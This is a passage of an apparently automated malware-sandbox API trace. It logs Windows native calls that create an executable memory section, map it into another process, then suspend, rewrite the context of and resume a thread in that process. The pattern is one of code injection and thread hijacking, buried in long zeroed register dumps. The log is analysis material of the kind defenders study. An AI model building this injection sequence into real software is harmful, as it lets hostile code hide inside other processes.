[298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0172.473] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0172.473] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x137200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x138000) returned 0x0 [0172.567] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x137200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2af0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x138000) returned 0x0 [0172.778] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0172.820] NtClose (Handle=0x140) returned 0x0 [0172.820] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x2f9000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x2b94707, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0172.832] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0172.832] NtClose (Handle=0xb4) returned 0x0 [0172.832] NtClose (Handle=0x138) returned 0x0 [0172.866] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1164, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0172.866] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0172.866] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0172.866] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x368000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0172.866] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0172.868] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1168) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0172.868] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0172.868] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x8ff0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0173.693] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x1, Esi=0x1, Ebx=0x1, Edx=0x0, Ecx=0x0, Eax=0xe8, Ebp=0x19f7cc, Eip=0x778a725c, SegCs=0x23, EFlags=0x206, Esp=0x19f63c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0173.693] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0173.694] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x14c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x14d000) returned 0x0 [0173.701] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x14c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x99c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x14d000) returned 0x0 [0173.742] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0173.754] NtClose (Handle=0x140) returned 0x0 [0173.754] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, 